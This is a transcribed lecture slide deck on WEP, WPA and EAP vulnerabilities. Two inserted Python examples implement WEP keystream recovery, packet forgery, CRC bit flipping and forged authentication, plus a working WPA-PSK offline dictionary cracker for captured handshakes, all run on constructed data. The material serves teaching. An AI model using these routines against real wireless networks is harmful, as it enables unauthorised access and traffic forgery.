Posted 31-Dec-2015 (upload: alexandra-zane)

Page 1: WEP, WPA, and EAP

WEP, WPA, and EAP

Drew Kalina

Page 2

Overview

- Wired Equivalent Privacy (WEP)
- Wi-Fi Protected Access (WPA)
- Extensible Authentication Protocol (EAP)

Page 3

WEP

- Encryption method: RC4
- Key size: 40 bits (104-bit keys were common in later "WEP-128" products)
- Integrity check: ICV, a CRC-32 over the payload (not a cryptographic hash)
- 802.1X authentication: optional
- Key distribution: manual

Page 4

WEP Vulnerabilities

- ICV is insecure: it is CRC-32, which is linear, so an attacker can flip bits in the encrypted payload and adjust the encrypted ICV to match the new contents without knowing the key.
- IV/keystream reuse attack: the 24-bit IV is small and is sent in plaintext, so the same IV (and therefore the same RC4 keystream) recurs; two frames under the same IV leak the XOR of their plaintexts.

Page 5

WEP Vulnerabilities (cont)

- Known plaintext attack: wireless traffic carries a lot of predictable TCP/IP content, and an attacker can generate more of it, e.g. by sending pings from the Internet to a station behind the access point.
- XORing the known plaintext (plus its ICV, which is computable) with the ciphertext recovers a keystream of length N for that IV.
- Any packet of size up to N can then be forged under that IV, because the receiver only checks the ICV.

Page 6

WEP Vulnerabilities (cont)

- Partial known plaintext: only a portion of the message is known (e.g. the IP header), so only M octets of keystream are recovered, where M < N.
- The known keystream can be extended from M to N bytes by probing: send guessed packets one byte longer than the known keystream and observe whether the access point accepts them.
- Packets can be diverted to the attacker by flipping CRC-32-protected bits (e.g. the destination address in the IP header) and repairing the ICV.

Page 7

WEP Vulnerabilities (cont)

- Authentication forging: shared-key authentication makes the client encrypt a challenge from the AP, and the client specifies the IV, so an attacker can answer with a recovered keystream for any IV it already knows.
- Dictionary attacks: the WEP key is often derived from a weak password.
- Real-time decryption: build a dictionary of keystreams indexed by IV. There are only 2^24 IVs, so with one maximum-size keystream per IV the table fits in about 24 GB of disk space.
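The attacks on pages 4 to 7 all follow from two facts: RC4 is a stream cipher, so a known plaintext gives the keystream for that IV, and the ICV is a linear CRC-32. The following is an added example, not code from the slides, that builds toy WEP frames and carries out keystream recovery, packet forgery under a reused IV, CRC bit flipping with ICV repair, and a forged shared-key authentication response. The key, IVs, packet contents and the AP challenge are constructed for illustration.

```python
import zlib

# Constructed example: toy WEP frames and the attacks the slides describe
# (keystream recovery from known plaintext, packet forgery under a reused IV,
# CRC-32 bit flipping, shared-key auth forgery). RC4, the CRC-32 ICV and the
# 3-byte cleartext IV are the real WEP building blocks; the key, IVs and
# packet contents are made up for illustration.

WEP_KEY = bytes.fromhex("0badc0ffee")  # constructed 40-bit WEP key


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the payload, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Frame body = IV (in the clear) || RC4(IV || key) XOR (data || ICV)."""
    plain = data + icv(data)
    return iv + xor(plain, rc4(iv + key, len(plain)))


def wep_decrypt(key: bytes, frame: bytes):
    """What the receiver does: return the payload if the ICV verifies, else None."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


# Attack 1: known plaintext -> N bytes of keystream for this IV.
def recover_keystream(frame: bytes, known_plain: bytes) -> bytes:
    """The ICV of a known plaintext is computable, so N = len(known) + 4."""
    return xor(frame[3:], known_plain + icv(known_plain))


# Attack 2: forge any packet of length <= N - 4 under that IV, without the key.
def forge(iv: bytes, keystream: bytes, new_data: bytes) -> bytes:
    plain = new_data + icv(new_data)
    if len(plain) > len(keystream):
        raise ValueError("keystream too short; extend it by probing first")
    return iv + xor(plain, keystream)


# Attack 3: flip payload bits and repair the encrypted ICV. CRC-32 is affine:
# for equal-length inputs crc(a ^ d) == crc(a) ^ crc(d) ^ crc(0...0).
def flip_bits(frame: bytes, delta: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    delta = delta.ljust(n, b"\x00")            # bits to flip, positionally
    icv_fix = xor(icv(delta), icv(bytes(n)))   # correction for the ICV field
    return iv + xor(body[:n], delta) + xor(body[n:], icv_fix)


# Attack 4: shared-key authentication. The AP sends a 128-byte challenge and
# the client returns it WEP-encrypted. The client chooses the IV, so a
# keystream of >= 132 bytes for any IV is enough to answer the challenge.
def forge_auth_response(iv: bytes, keystream: bytes, challenge: bytes) -> bytes:
    return forge(iv, keystream, challenge)


def demo() -> dict:
    iv = b"\x01\x02\x03"
    known = b"GET /index.html HTTP/1.0\r\n\r\n"            # constructed known plaintext
    frame = wep_encrypt(WEP_KEY, iv, known)                 # what the attacker sniffs
    ks = recover_keystream(frame, known)
    forged = forge(iv, ks, b"ping 10.0.0.1 from eve")
    flipped = flip_bits(frame, b"\x17\x10")                 # "GET" -> "PUT"
    # A longer known plaintext (e.g. attacker-injected padding) under the
    # same IV gives a longer keystream for the same IV.
    padding = b"injected echo-request padding " * 6
    long_ks = recover_keystream(wep_encrypt(WEP_KEY, iv, padding), padding)
    challenge = bytes((i * 7) & 0xFF for i in range(128))  # constructed AP challenge
    response = forge_auth_response(iv, long_ks, challenge)
    return {
        "forged": wep_decrypt(WEP_KEY, forged),
        "flipped": wep_decrypt(WEP_KEY, flipped),
        "auth_ok": wep_decrypt(WEP_KEY, response) == challenge,
    }


if __name__ == "__main__":
    print(demo())
```

Run it and all three attacks succeed against `wep_decrypt`, which is exactly the check a real receiver performs: the forged and bit-flipped frames verify, and the forged authentication response decrypts to the challenge. The same bit-flip without the ICV correction is rejected, which is why the CRC's linearity, not just its presence, is the problem.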

Page 8

WEP summary

- Weak encryption with other problems
- If possible, use some other protocol
- Still better than plaintext, but only marginally: a busy WEP network can be keyed in minutes with current tools

Page 9

WPA

- Encryption method: RC4 with TKIP per-packet key mixing
- Key size: 128 bits (varies)
- Integrity check: ICV plus the Michael MIC
- 802.1X authentication: can be required
- Key distribution: TKIP (temporal keys derived per session and mixed per packet)

Page 10

WPA (cont)

- Michael generates a MIC (Message Integrity Code) of 64 bits (8 bytes), placed between the data and the ICV.
- TKIP (Temporal Key Integrity Protocol) negotiates the keys to be used from the client's configuration, changes the encryption key every frame (per-packet key mixing), and sets a unique default key for each client.

Page 11

WPA Vulnerabilities

- Birthday attack: collect pairs (M_i, D_i) with D_i = MIC(M_i); the attack succeeds when D_i = D_1 for some i != 1.
- Expected cost: about 2^32 messages (the birthday bound for a 64-bit MIC).
- If the keys change during the attack, the forgery is garbage.

Page 12

WPA Vulnerabilities (cont)

- Differential cryptanalytic attack: Michael outputs have special characteristics.
- For message pairs, M = M_i XOR M_j and D = D_i XOR D_j are called characteristic differentials.
- Once characteristic differentials are obtained, try to find the MIC (learning parts of the key).
- Cost about 2^30 trials; an optimized attack exists with O(2^29) work.

Page 13

WPA Vulnerabilities (cont)

- Temporal key recovery: if the RC4 per-packet keys are lost (leaked), an attacker can discover the temporal key (TK) and the MIC key and forge messages.
- Not a practical attack, O(2^105), but it does show susceptibility in parts of WPA.

Page 14

WPA Vulnerabilities (cont)

- DoS: the access point shuts down for 60 seconds when forged data (a MIC failure) is detected, as a countermeasure against MIC forgery.
- This makes it possible to keep an access point down with very little network activity: a couple of forged frames per minute is enough.
- PSK: used in the absence of 802.1X, usually one key per ESS. An insider who knows the PSK can combine it with another client's captured MAC address and nonces to derive that client's session keys and imitate it.
- A short PSK is vulnerable to offline dictionary attacks by an outsider who captures a single handshake.
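Both PSK weaknesses come from the same property: the pairwise keys are a deterministic function of the PSK and values sent in the clear during the 4-way handshake (the two MAC addresses and the two nonces). The following is an added example, not code from the slides, that derives the PMK and PTK as IEEE 802.11i specifies, shows that an insider with the PSK reproduces another client's PTK from sniffed values, and runs an offline dictionary attack against a captured message 2. The SSID/passphrase pair is the 802.11i Annex H test vector; the MAC addresses, nonces, EAPOL frame layout values and word list are constructed.

```python
import hashlib
import hmac

# Constructed example of WPA/WPA2-Personal key derivation and the two PSK
# weaknesses the slide lists. The derivation steps (PBKDF2, PRF-n, EAPOL MIC)
# follow IEEE 802.11i; the MAC addresses, nonces, EAPOL frame and word list
# below are made up for illustration.

# EAPOL hdr(4) + type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK = PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK depends only on the PMK plus public handshake values (MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)  # 48 bytes for CCMP, 64 for TKIP


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): HMAC-SHA1-128 over the EAPOL frame with
    the MIC field zeroed. TKIP (version 1) uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 of the 4-way handshake, MIC field zeroed."""
    body = (b"\x02"                                    # descriptor type: RSN
            + b"\x01\x0a"                              # key info: version 2, pairwise, MIC set
            + b"\x00\x10"                              # key length
            + (1).to_bytes(8, "big")                   # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, ID
            + bytes(16)                                # MIC field (zero while computing)
            + b"\x00\x00")                             # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, aa, spa, anonce, snonce, eapol, wordlist):
    """Offline dictionary attack: everything except the passphrase is in the capture."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


def demo() -> dict:
    ssid, passphrase = "IEEE", "password"                     # 802.11i Annex H test vector
    aa = bytes.fromhex("a1b2c3d4e5f6")                        # AP MAC (constructed)
    spa = bytes.fromhex("02aabbccddee")                       # victim client MAC (constructed)
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))   # constructed nonces
    # Legitimate client: derive PTK and sign message 2 with the KCK (first 16 bytes).
    pmk = pmk_from_passphrase(passphrase, ssid)
    ptk = derive_ptk(pmk, aa, spa, anonce, snonce)
    msg2 = build_msg2(snonce)
    mic = eapol_mic(ptk[:16], msg2)
    captured = msg2[:MIC_OFFSET] + mic + msg2[MIC_OFFSET + 16:]
    # Insider: knows the PSK, sniffs the MACs and nonces, ends up with the victim's PTK.
    insider_ptk = derive_ptk(pmk, aa, spa, anonce, snonce)
    # Outsider: one captured handshake plus a word list.
    cracked = crack_psk(ssid, aa, spa, anonce, snonce, captured,
                        ["letmein", "Password1", "password", "hunter2"])
    return {"pmk": pmk.hex(), "insider_has_ptk": insider_ptk == ptk, "cracked": cracked}


if __name__ == "__main__":
    print(demo())
```

The expensive step for the outsider is the 4096-iteration PBKDF2 per candidate, which is why the attack is only practical against short or dictionary passphrases; nothing in the derivation stops the insider, which is the argument for 802.1X over a shared PSK.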

Page 15

WPA summary

- Much better than WEP (if 802.1X is used)
- WPA2 is better still, using AES-CCMP
- There are still vulnerabilities
- Many WEP devices are upgradeable to WPA (not WPA2), because TKIP keeps the RC4 hardware

Page 16

Suggestions for WPA

- Rekey security associations after failures
- Lower or eliminate the timeouts after detecting forged packets, since they are what the DoS exploits; with the current 60-second timeouts a MIC forgery would take 1000+ years

Page 17

EAP

- A transport method and framework for authentication protocols
- Works with many authentication back ends such as RADIUS and Kerberos
- Carried over a variety of transports (e.g. 802.1X/EAPOL on wireless LANs)

Page 18

EAP methods

- EAP-TLS
- EAP-TTLS
- PEAP (Protected EAP)
- LEAP (Lightweight EAP, Cisco)

Page 19

Vulnerabilities in LEAP

- Dictionary attack: LEAP's challenge/response is based on early MS-CHAP, which is weak, so a captured exchange can be attacked offline

Page 20

That's all!